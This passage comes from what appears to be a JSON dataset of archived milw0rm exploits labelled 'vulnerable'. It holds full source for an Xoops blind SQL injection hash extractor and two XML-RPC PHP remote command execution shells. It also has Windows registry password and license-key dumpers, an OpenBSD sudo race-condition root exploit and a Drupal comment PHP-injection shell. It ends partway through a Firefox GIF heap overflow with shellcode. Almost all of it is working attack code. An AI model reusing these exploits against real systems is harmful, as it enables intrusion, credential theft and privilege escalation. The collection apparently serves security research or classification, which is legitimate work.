$name\n\n  USER HASH : $allchar\n\n ---------------------------------------------------------------\n\n };\n\n }\n\n else\n\n {\n\n print \"\\b\\b FAILED ]\";\n\n }\n\n exit();  \n\n }\n\nelse \n\n {  \n\n $allchar .= chr($char); \n\n }\n\n$s_num++;\n\n}\n\n\n\nsub found($$)\n\n {\n\n my $fmin = $_[0];\n\n my $fmax = $_[1];\n\n if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }\n\n \n\n $r = int($fmax - ($fmax-$fmin)/2);\n\n $check = \"/**/BETWEEN/**/$r/**/AND/**/$fmax\";\n\n if ( &check($check) ) { &found($r,$fmax); }\n\n else { &found($fmin,$r); }\n\n }\n\n \n\nsub crack($$)\n\n {\n\n my $cmin = $_[0];\n\n my $cmax = $_[1];\n\n $i = $cmin;\n\n while ($i<$cmax)\n\n  {\n\n  $crcheck = \"=$i\";\n\n  if ( &check($crcheck) ) { return $i; }\n\n  $i++;\n\n  }\n\n $i = 0;\n\n return $i;\n\n }\n\n \n\nsub check($)\n\n {\n\n $n++;\n\n status();\n\n $ccheck = $_[0]; \n\n\n\n $data  = '<?xml version=\"1.0\"?>';\n\n $data .= '<methodCall>';\n\n $data .= '<methodName>blogger.getUsersBlogs</methodName>';\n\n $data .= '<params>';\n\n $data .= '<param>';\n\n $data .= '<value><string></string></value>';\n\n $data .= '</param>';\n\n $data .= '<param>';\n\n $data .= '<value><string>'.$name.'\\' AND ascii(substring(pass,'.$s_num.',1))'.$ccheck.')/*</string></value>';\n\n $data .= '</param>';\n\n $data .= '</params>';\n\n $data .= '</methodCall>';\n\n\n\n $req = new HTTP::Request 'POST' => $url;\n\n $req->content_type('application/xml');\n\n $req->content($data);\n\n $ua = new LWP::UserAgent;\n\n $res = $ua->request($req);\n\n $reply= $res->content;\n\n if($reply =~ /Selected blog application does not exist/) { print \"\\n [-] NEWS BLOG DOES NOT EXIST =(\\n [-] EXPLOIT FAILED!\\n\"; exit(); }\n\n if($reply =~ /User authentication failed/) { return 0; }\n\n else { return 1; }\n\n }\n\n \n\nsub status()\n\n{\n\n  $status = $n % 5;\n\n  if($status==0){ print \"\\b\\b/]\";  }\n\n  if($status==1){ print \"\\b\\b-]\";  }\n\n  if($status==2){ print \"\\b\\b\\\\]\"; }\n\n  if($status==3){ print \"\\b\\b|]\";  }\n\n}\n\n\n\nsub usage()\n\n {\n\n &head;\n\n print q(\n\n  USAGE:\n\n  r57xoops.pl [OPTIONS]\n\n  \n\n  OPTIONS:\n\n  -u [URL]      - path to xmlrpc.php\n\n  -n [USERNAME] - user for bruteforce\n\n  \n\n  E.G.\n\n  r57xoops.pl -u http://server/xoops/xmlrpc.php -n admin\n\n ---------------------------------------------------------------\n\n (c)oded by 1dt.w0lf\n\n RST/GHC , http://rst.void.ru , http://ghc.ru\n\n );\n\n exit();\n\n }\n\nsub head()\n\n {\n\n print q(\n\n ---------------------------------------------------------------\n\n   Xoops <= 2.0.11 xmlrpc.php sql injection exploit by RST/GHC\n\n ---------------------------------------------------------------\n\n );\n\n }\n\n\n\n# milw0rm.com [2005-07-04]",
450        "vulnerable": true
451    },
452    {
453        "exploit_id": 1083,
454        "content": "#-------------------------------------------------------#\n\n#                     /|                                #       \n\n#                    | |                                #      \n\n#                    | |                                #      \n\n#       /\\   ________| |___                             #       \n\n#      /  \\  \\_______   __/                             #\n\n#     /    \\|\\_____  | | _       _  _     _  ()___      #      \n\n#    /  /\\  \\  ___ \\ | |<_>  /  |  |  | || \\ || | | |   #       \n\n#   /  /__\\  \\|   \\ || | _  /__ |_ |  | ||_/ || | |_|   #       \n\n#  /  ______  \\   | || || |   / |  |  | || \\ || |   |   #       \n\n# /  /      \\  \\  | || || |  /  |_ |_ |_||  \\|| | \\_|   #       \n\n# \\_/       |\\_/  | || || | ___ _  _                    #       \n\n#           | |   | || /| |  | |  | ||\\/|               #       \n\n#            \\|    \\||/  \\|  | |_ |_||  |               #       \n\n#                            | |  | ||  |               #       \n\n#                            | |_ | ||  |               #       \n\n#                                                       #\n\n#         Original advisory by http://gulftech.org/     #\n\n#         Exploit coded by dukenn (http://asteam.org)   #\n\n#                                                       # \n\n#-------------------------------------------------------\n\n\n\n#!/usr/bin/perl\n\n\n\nuse IO::Socket;\n\n\n\nprint \"XMLRPC remote commands execute exploit by dukenn (http://asteam.org)\\n\";\n\n\n\nif ($ARGV[0] && $ARGV[1])\n\n{\n\n $host = $ARGV[0];\n\n $xml = $ARGV[1];\n\n $sock = IO::Socket::INET->new( Proto => \"tcp\", PeerAddr => \"$host\", PeerPort => \"80\") || die \"connecterror\\n\";\n\n while (1) {\n\n    print '['.$host.']# ';\n\n    $cmd = <STDIN>;\n\n    chop($cmd);\n\n    last if ($cmd eq 'exit');\n\n    $xmldata = \"<?xml version=\\\"1.0\\\"?><methodCall><methodName>test.method</methodName><params><param><value><name>',''));echo '_begin_\\n';echo `\".$cmd.\"`;echo '_end_';exit;/*</name></value></param></params></methodCall>\";\n\n    print $sock \"POST \".$xml.\" HTTP/1.1\\n\";\n\n    print $sock \"Host: \".$host.\"\\n\";\n\n    print $sock \"Content-Type: text/xml\\n\";\n\n    print $sock \"Content-Length:\".length($xmldata).\"\\n\\n\".$xmldata;\n\n    $good=0;\n\n    while ($ans = <$sock>)\n\n       {\n\n        if ($good == 1) { print \"$ans\"; }\n\n        last if ($ans =~ /^_end_/);\n\n        if ($ans =~ /^_begin_/) { $good = 1; }\n\n       }\n\n      if ($good==0) {print \"Exploit Failed\\n\";exit();}\n\n   }\n\n }\n\nelse {\n\n print \"Usage: perl xml.pl [host] [path_to_xmlrpc]\\n\\n\";\n\n print \"Example: perl xml.pl target.com /script/xmlrpc.php\\n\";\n\nexit;\n\n}\n\n\n\n# milw0rm.com [2005-07-04]",
455        "vulnerable": true
456    },
457    {
458        "exploit_id": 1084,
459        "content": "#!/usr/bin/perl -w\n\n# ********************************************************\n\n# XML-RPC Remote Command Execution Exploit By Mike Rifone\n\n# ********************************************************\n\n# This works on da phpxmlrpc, and da PEAR XML_RPC too! All\n\n# you need is to put the url to the server and u get shell\n\n# Dis is my first exploit but hey it works :D ~Mike@Rifone\n\n# ********************************************************\n\n\n\nuse LWP::UserAgent;\n\n\n\n$brws = new LWP::UserAgent;\n\n$brws->agent(\"Internet Explorer 6.0\");\n\n\n\n$host = $ARGV[0]; \n\n\n\nif ( !$host ) \n\n{ \n\n\tdie(\"Usage: xmlrpcexec.pl http://pathto/xmlrpcserver\"); \n\n}\n\n\n\nwhile ( $host ) \n\n{\n\n\n\n\tprint \"xmlrpc\\@\\#\";\n\n\t\n\n\t$exec = <STDIN>;\t\n\n\t$data = \"<?xml version=\\\"1.0\\\"?><methodCall><methodName>foo.bar</methodName><params><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><name>','')); system('$exec'); die; /*</name></value></param></params></methodCall>\";\n\n\t\n\n\t$send = new HTTP::Request POST => $host;\n\n\t$send->content($data);\n\n\t$gots = $brws->request($send);\t\n\n\t$show = $gots->content;\n\n\t\n\n\tif ( $show =~ /<b>([\\d]{1,10})<\\/b><br \\/>(.*)/is )\n\n\t{\n\n\t    print $2 . \"\\n\";\n\n\t}\n\n\telse\n\n\t{\n\n\t\tprint \"$show\\n\";\n\n\t}\n\n\n\n\n\n}\n\n\n\n# milw0rm.com [2005-07-04]",
460        "vulnerable": true
461    },
462    {
463        "exploit_id": 1085,
464        "content": "/*****************************************************************\n\n\n\nWilling Webcam 2.8 licence info disclosure local exploit by Kozan\n\n\n\nApplication: Willing Webcam 2.8 (and probably prior versions)\n\nVendor: Willing Software - www.willingsoftware.com\n\nVulnerable Description: Willing Webcam 2.8 discloses licence\n\ninformations (username and key) to local users.\n\n\n\nDiscovered & Coded by: Kozan\n\nCredits to ATmaCA\n\nWeb: www.netmagister.com\n\nWeb2: www.spyinstructors.com\n\nMail: kozan@netmagister.com\n\n\n\n*****************************************************************/\n\n\n\n#include <stdio.h>\n\n#include <windows.h>\n\n#define BUF 100\n\n\n\nint main()\n\n{\n\n\n\n       HKEY hKey;\n\n       char Name[BUF], Key[BUF];\n\n       DWORD dwBUFLEN = BUF;\n\n       LONG lRet;\n\n\n\n       if( RegOpenKeyEx(HKEY_CURRENT_USER,\n\n                                        \"Software\\\\Willing Software\\\\Willing WebCam\",\n\n                                        0,\n\n                                        KEY_QUERY_VALUE,\n\n                                        &hKey ) == ERROR_SUCCESS )\n\n       {\n\n               lRet = RegQueryValueEx(hKey, \"Name\", NULL, NULL, (LPBYTE)Name, &dwBUFLEN);\n\n               if (lRet != ERROR_SUCCESS || dwBUFLEN > BUF) strcpy(Name,\"Not Found!\");\n\n\n\n               lRet = RegQueryValueEx(hKey, \"Key\", NULL, NULL, (LPBYTE)Key, &dwBUFLEN);\n\n               if (lRet != ERROR_SUCCESS || dwBUFLEN > BUF) strcpy(Key,\"Not Found!\");\n\n\n\n               RegCloseKey(hKey);\n\n\n\n               printf(\"Willing Webcam 2.8 Local Exploit by Kozan\\n\");\n\n               printf(\"Credits to ATmaCA\\n\");\n\n               printf(\"www.netmagister.com - www.spyinstructors.com \\n\");\n\n               printf(\"kozan@netmagister.com\\n\\n\");\n\n               printf(\"Licence Name : %8s\\n\",Name);\n\n               printf(\"Licence Key  : %8s\\n\",Key);\n\n       }\n\n       else\n\n       {\n\n               printf(\"Willing Webcam 2.8 is not installed on your system!\\n\");\n\n       }\n\n       return 0;\n\n}\n\n\n\n// milw0rm.com [2005-07-04]",
465        "vulnerable": true
466    },
467    {
468        "exploit_id": 1086,
469        "content": "/*****************************************************************\n\n\n\nAccess Remote PC 4.5.1 Local Password Disclosure Exploit by Kozan\n\n\n\nApplication: Access Remote PC 4.5.1 (and probably prior versions)\n\nVendor: www.access-remote-pc.com\n\n\n\nVulnerable Description: Access Remote PC 4.5.1 discloses passwords\n\nto local users.\n\n\n\nDiscovered & Coded by: Kozan\n\nCredits to ATmaCA\n\nWeb : www.netmagister.com\n\nWeb2: www.spyinstructors.com\n\nMail: kozan@netmagister.com\n\n\n\n*****************************************************************/\n\n\n\n#include <windows.h>\n\n#include <stdio.h>\n\n\n\n#define BUF 100\n\n\n\nint main()\n\n{\n\n       HKEY hKey;\n\n       char RPCNumber[BUF], Password[BUF];\n\n       DWORD dwBuf = BUF;\n\n\n\n       if( RegOpenKeyEx( HKEY_CURRENT_USER,\n\n                         \"Software\\\\Access Remote PC\\\\Client\\\\Options\\\\Proxy\",\n\n                         0,\n\n                         KEY_QUERY_VALUE,\n\n                         &hKey\n\n                         ) !=ERROR_SUCCESS )\n\n       {\n\n               fprintf( stdout, \"Access Remote PC is not installed on you PC!\\n\" );\n\n               return -1;\n\n       }\n\n\n\n       if( RegQueryValueEx( hKey,\n\n                            \"RPCNumber\",\n\n                            NULL,\n\n                            NULL,\n\n                            (BYTE *)&RPCNumber,\n\n                            &dwBuf\n\n                            ) != ERROR_SUCCESS )\n\n       lstrcpy( RPCNumber,\"Not Found!\\n\" );\n\n\n\n       if( RegQueryValueEx( hKey,\n\n                            \"Password\",\n\n                            NULL,\n\n                            NULL,\n\n                            (BYTE *)&Password,\n\n                            &dwBuf\n\n                            ) != ERROR_SUCCESS )\n\n       lstrcpy( Password,\"Not Found!\\n\" );\n\n\n\n       fprintf( stdout, \"Access Remote PC 4.5.1 Local Exploit by Kozan\\n\" );\n\n       fprintf( stdout, \"Credits to AtmaCA\\n\" );\n\n       fprintf( stdout, \"www.netmagister.com - www.spyinstructors.com \\n\" );\n\n       fprintf( stdout, \"kozan@netmagister.com\\n\\n\" );\n\n       fprintf( stdout, \"RPCNumber\\t: %s\\n\", RPCNumber );\n\n       fprintf( stdout, \"Password\\t: %s\\n\", Password );\n\n\n\n       return 0;\n\n}\n\n\n\n// milw0rm.com [2005-07-04]",
470        "vulnerable": true
471    },
472    {
473        "exploit_id": 1087,
474        "content": "#include <stdio.h> \n\n#include <stdlib.h> \n\n#include <unistd.h> \n\n#include <sysexits.h> \n\n#include <sys/wait.h> \n\n\n\n#define SUDO \"/usr/bin/sudo\" \n\n#ifdef BUFSIZ \n\n#undef BUFSIZ \n\n#define BUFSIZ 128 \n\n#endif \n\n\n\n/* \n\nANY MODIFIED REPUBLISHING IS RESTRICTED \n\nOpenBSD sudo 1.3.1 - 1.6.8p local root exploit \n\nTested under OpenBSD 3.6 sudo 1.6.7p5 \n\nVuln by OpenBSD errata, http://www.openbsd.org/errata.html \n\n(c)oded by __blf 2005 RusH Security Team, http://rst.void.ru \n\nRace condition in path name, can take a while to exploit \n\nGr33tz: x97Rang, whice, rsh, MishaSt, Inck-Vizitor, BlackPrince \n\nFck lamerz: Saint_I, nmalykh \n\nAll rights reserved. \n\nANY MODIFIED REPUBLISHING IS RESTRICTED \n\n*/ \n\n\n\nint main (int argc, char ** argv) \n\n{ \n\npid_t pid; \n\nvoid * buffer; \n\nchar * exec, * race, * path; \n\nif(argc != 3) \n\n{ \n\nfprintf(stderr, \"r57sudo.c by __blf\\n\"); \n\nfprintf(stderr, \"RusH Security Team\\n\"); \n\nfprintf(stderr, \"Usage: %s <sudo full path command> <sudo command>\\n\", \n\nargv[0]); \n\nfprintf(stderr, \"e.g. ./r57sudo /bin/ls ls\\n\"); \n\nreturn EX_USAGE; \n\n} \n\npid = fork(); \n\nif(pid == 0) \n\n{ \n\nwhile(1) \n\n{ \n\nexec = (char *)calloc(BUFSIZ, sizeof(char)); \n\nrace = (char *)calloc(BUFSIZ, sizeof(char)); \n\nbzero(exec, sizeof(exec)); \n\nsnprintf(exec, BUFSIZ, \"ln -fs %s /tmp/%s\", argv[1], argv[2]); \n\nsystem((char *)exec); \n\nbzero(race, sizeof(race)); \n\nsnprintf(race, BUFSIZ, \"rm /tmp/%s\", argv[2]); \n\nsystem((char *)race); \n\nbzero(race, sizeof(race)); \n\nsnprintf(race, BUFSIZ, \"ln -fs /bin/sh /tmp/%s\", argv[2]); \n\nsystem((char *)race); \n\nbzero(race, sizeof(race)); \n\nsnprintf(race, BUFSIZ, \"rm /tmp/%s\", argv[2]); \n\nsystem((char *)race); \n\n} \n\n} \n\nif(pid > 0) \n\n{ \n\nwhile(1) \n\n{ \n\npath = (char *)calloc(BUFSIZ/2, sizeof(char)); \n\nsnprintf(path, BUFSIZ/2, \"%s /tmp/%s\", SUDO, argv[2]); \n\nsystem((char *)path); \n\n} \n\n} \n\n} \n\n\n\n// milw0rm.com [2005-07-04]",
475        "vulnerable": true
476    },
477    {
478        "exploit_id": 1088,
479        "content": "#!/usr/bin/perl\n\n# Mon Jul  4 18:19:35 CEST 2005 dab@digitalsec.net\n\n#\n\n# DRUPAL-SA-2005-002 php injection in comments (yes, its lame)\n\n# Hax0r code here, read before execute\n\n#\n\n# Run without arguments to show the help.\n\n#\n\n# BLINK! BLINK! BLINK! BLINK!\n\n#\n\n# Feel free to port to another stupid script language (mIRC,\n\n# python, TCL or orthers), and send to securiteam (AGAIN)\n\n# \n\n# Theo, this one hasn't been tested in BSD.. yet!\n\n# infohacking: there're a lot of xss in drupal, contact me if you want \n\n# to program some exploits.\n\n#\n\n# BLINK! BLINK! BLINK! BLINK!\n\n#\n\n#\n\n# HERE YOU CAN PUT YOUR BANNER!!!! THOUSENDS OF PEOPLE IS READING THIS LINE\n\n# contact me for pricing and offerings.\n\n#\n\n# !dSR: yubiiiiii yeooooooooooo\n\n#\n\nuse LWP::UserAgent;\n\nuse HTTP::Cookies;\n\nuse LWP::Simple;\n\nuse HTTP::Request::Common \"POST\";\n\nuse HTTP::Response;\n\nuse Getopt::Long;\n\nuse strict;\n\n\n\n$| = 1; # ;1 = |$\n\n\n\nmy ($proxy,$proxy_user,$proxy_pass);\n\nmy ($host,$debug,$drupal_user,$drupal_pass);\n\nmy $options = GetOptions (\n\n  'host=s'\t\t     => \\$host, \n\n  'proxy=s'           => \\$proxy,\n\n  'proxy_user=s'      => \\$proxy_user,\n\n  'proxy_pass=s'      => \\$proxy_pass,\n\n  'drupal_user=s'      => \\$drupal_user,\n\n  'drupal_pass=s'      => \\$drupal_pass,\n\n\t'debug'         \t => \\$debug);\n\n\n\n&help unless ($host);\n\n\n\nwhile (1){\n\n    print \"druppy461\\$ \";\n\n    my $cmd = <STDIN>;\n\n    &druppy($cmd);\n\n}\n\nexit (1); # could be replaced with exit(2)\n\n\n\n\n\nsub druppy {\n\n    chomp (my $cmd = shift);\n\n    LWP::Debug::level('+') if $debug;\n\n\n\n    my $ua = new LWP::UserAgent(\n\n            cookie_jar=> { file => \"$$.cookie\" });   # this is a random feature\n\n    $ua->agent(\"Morzilla/5.0 (THIS IS AN EXPLOIT. IDS, PLZ, Gr4b ME!!!\");\n\n\n\n    if ($drupal_user) { # no need to exploit \n\n        my ($mhost, $h);\n\n        if ($host =~ /(http:\\/\\/.*?)\\?q=/) {\n\n            $mhost = $1;\n\n            $h = $mhost . \"?q=user/login\";\n\n        } #some magic hacking here\n\n        else { \n\n            $host =~ /(.*?)\\/.*?\\//; $mhost =$1;\n\n            $h = $mhost . \"/user/login\";\n\n        }\n\n        print $h . \"\\n\" if $debug; \n\n        my $req = POST $h,[\n\n            'edit[name]' => \"$drupal_user\",\n\n            'edit[pass]' => \"$drupal_pass\"\n\n                ]; #grab these, and send to dsr!\n\n        print $req->as_string() if $debug;\n\n        my $res = $ua->request($req);\n\n        print $res->content() if $debug;\n\n        if ($res->is_redirect eq 1) {\n\n            print \"Logged\\n\" if $debug;\n\n        }\n\n    }\n\n\n\n    $ua->proxy(['http'] => $proxy) if $proxy;\n\n    my $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;\n\n    my $res = $ua->get(\"$host\");\n\n    my $html = $res->content();\n\n    my @op; # buffer overflow here\n\n    foreach (split(/\\n/,$html)) { \n\n        if ( m/name=\"op\" value=\"(.*?)\"/){\n\n            push(@op,$1);\n\n        }\n\n    }# xss here\n\n\n\n    my $ok = 0; # globlal for admin purposes\n\n    foreach my $op (@op) {\n\n        my $req = POST \"$host\",[\n\n            'edit[subject]' => 'test',\n\n            'edit[comment]' => \n\n             \"<?php print(\\\"BLAH\\\\n\\\");system(\\\"$cmd\\\"); print(\\\"BLAH\\\\n\\\");  php?>\",\n\n            'edit[format]' => '2',\n\n            'edit[cid]' => \"\", # drupal is sick.. it doesn't need arguments\n\n            'edit[pid]' => \"\", # they use it to grab some statistycal information\n\n            'edit[nid]' => \"\", # about users conduits. Don't buy in internet using drupal\n\n            'op' => \"$op\"\n\n                ];\n\n\n\n        print $req->as_string() if $debug;\n\n        my $res = $ua->request($req);\n\n        my $html = $res->content(); \n\n        print $html if $debug;\n\n        foreach (split(/\\n/,$html)) {\n\n            return if $ok gt \"1\";       # super hack de phrack\n\n            if (/BLAH/) { $ok++; next }\n\n            print \"$_\\n\" if $ok eq \"1\"; # /n is for another line in screen\n\n        }\n\n    }\n\n}\n\n\n\n\n\nsub help {\n\n    print \"Syntax: ./$0 <url> [options]\\n\";\n\n    print \"\\t--drupal_user, --drupal_pass  (needed if dont allow anonymous posts)\\n\";\n\n    print \"\\t--proxy (http), --proxy_user, --proxy_pass\\n\";\n\n    print \"\\t--debug\\n\";\n\n    print \"\\nExample\\n\";\n\n    print \"bash# $0 --host=http://www.server.com/?q=comment/reply/1\\n\";\n\n    print \"\\n\";\n\n    exit(1);\n\n}\n\n\n\n\n\n#sub 0day_solaris {\n\n# please put your code here\n\n#}\n\n\n\n# milw0rm.com [2005-07-05]",
480        "vulnerable": true
481    },
482    {
483        "exploit_id": 1089,
484        "content": "/*\n\n\n\n  Mozilla FireFox <= 1.0.1 Remote GIF Heap Overflow Exploit\n\n\n\n  by Darkeagle of uKt Researcherz\n\n  darkeagle [at] linkin-park [dot] cc\n\n\n\n  greetz to all my friends }8{)\n\n\n\n  and... Happy Birthday uKt research team }8{) 1 year }8{)\n\n\n\n  http://unl0ck.org\n\n\n\n  !!!-script kiddie edition-!!!\n\n\n\n               ^^^^^^^^^^^^^^^^^^^^\n\n             U     U   k  kk  ttttttt\n\n            U     U   k  k      tt\n\n            U    U   k kk      tt    (c) '04-'05 \t\t55k7 researcherz\n\n             UUU    k   kk    tt\n\n           ^^^^^^^^^^^^^^^^^^^^^^^^^\n\n\n\n             successfully tested on: Notebook LogyCom Expert Intel Pentium IV 2.8 Ghz, 256RAM, 40GB, 64mb Video SiS,\n\n             \t\t\t\t\t\t\t\t WinXP SP1 RuS Pirated Edition\n\n             exploit calls Standart Windows Calculator\n\n\n\n            shellcode:\n\n\n\n-----------------------\n\nxor     eax, eax\n\npush    eax\n\npush    0x636c6163 ; calc\n\npush    esp\n\npop     ebx\n\npush    eax\n\npush    ebx\n\nmov     ecx, 0x77c18044  ; moved system() in %ecx\n\ncall    ecx              ; call system()\n\n-----------------------\n\n\n\nbtw c0wZ happy birthday }:@\n\n\n\n          ,-\"\"\"-,\n\n          )~   ~(       ------------------------------------------------\n\n      .-'(       )`-,  | m00[ov3r]:                                     |\n\n      `~o`d\\   /b`o~`  |  \"i would drop you if you'll release exploit\"  |\n\n          |     |      |                                                |\n\n          (6___6)      |     hahaha m00 wanna ownZ j00 <:@              |\n\n           `--U`       |                                                |\n\n                        ------------------------------------------------\n\n\n\n\n\n*/\n\n\n\n#include <stdio.h>\n\n#include <string.h>\n\n#include <windows.h>\n\n\n\n#define FILENAME \"firesnake.gif\"\n\n\n\nunsigned char data1[] = {\n\n\t0x47, 0x49, 0x46, 0x38, 0x39, 0x61, 0x10, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x21, 0xFF, 0x0B,\n\n\t0x4E, 0x45, 0x54, 0x53, 0x43, 0x41, 0x50, 0x45, 0x32, 0x2E, 0x30, 0x55, 0x02, 0x00, 0x10, 0x00,\n\n\t0x00, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,\n\n\t0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,\n\n\t0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,\n\n\t0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,\n\n\t0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,\n\n\t0x41, 0x07, 0x02, 0xF8, 0xFF, 0xFF, 0xFF, 0x41, 0x41, 0x64, 0x02, 0x14, 0x00, 0x00, 0x00, 0xCC,\n\n\t0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,\n\n\t0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,\n\n\t0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,\n\n\t0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,\n\n\t0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,\n\n\t0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,\n\n\t0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,\n\n\t0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,\n\n\t0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,\n\n\t0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,\n\n\t0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,\n\n\t0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0x61, 0x61,\n\n\t0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61,\n\n\t0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61,\n\n\t0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61,\n\n\t0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61,\n\n\t0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61,\n\n\t0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61,\n\n\t0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61,\n\n\t0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61,\n\n\t0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61,\n\n\t0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61,\n\n\t0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61,\n\n\t0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61,\n\n\t0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61,\n\n\t0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61,\n\n\t0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61,\n\n\t0x61, 0x61, 0x61, 0x61, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43,\n\n\t0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43,\n\n\t0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43,\n\n\t0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x42, 0x42, 0x60, 0x00, 0x90, 0x00, 0x42, 0x42, 0x42,\n\n\t0x42, 0x30, 0x02, 0x02, 0x00, 0x00, 0xE0, 0xFD, 0x7F, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43,\n\n\t0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43,\n\n\t0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43,\n\n\t0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43,\n\n\t0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43,\n\n\t0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43,\n\n\t0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43,\n\n\t0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 